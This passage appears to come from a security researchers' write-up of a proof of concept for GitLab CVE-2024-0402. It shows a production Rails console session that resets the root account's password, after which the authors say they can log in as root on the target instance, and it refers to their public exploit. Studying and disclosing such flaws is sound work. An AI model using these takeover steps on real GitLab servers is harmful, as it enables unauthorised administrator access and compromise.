➜ git@gitinstance.local:~$ gitlab-rails console --environment production
--------------------------------------------------------------------------------
Ruby: ruby 3.1.4p223 (2023-03-30 revision 957bb7cb81) [x86_64-linux]
GitLab: 16.8.0-ee (1e912d57d5a) EE
GitLab Shell: 14.32.0
PostgreSQL: 14.9
------------------------------------------------------------[ booted in 39.28s ]
Loading production environment (Rails 7.0.8)
irb(main):002:0> user = User.find_by_username 'root'
=> #<User id:1 @root>
irb(main):003:0> new_password = 'ItIsPartyTime!'
=> "ItIsPartyTime!"
irb(main):004:0> user.password = new_password
=> "ItIsPartyTime!"
irb(main):005:0> user.password_confirmation = new_password
=> "ItIsPartyTime!"
irb(main):006:0> user.password_automatically_set = false
irb(main):007:0> user.save!
=> true
Finally, you are ready to authenticate as the root
user in the target Web instance.
Our goal was to build a PoC for CVE-2024-0402. We were able to do it despite the restricted time and connectivity. Still, there were tons of configuration errors while preparing the GitLab Workspaces environment, we almost surrendered because the feature itself was just not working after hours of setup. Once again, that demonstrates how very good bugs can be found in places where just a few people adventure because of config time constraints.
Shout out to joernchen for the discovery of the chain. Not only was the bug great, but he also did an amazing work in describing the research path he followed in this article. We had fun exploiting it and we hope people will save time with our public exploit!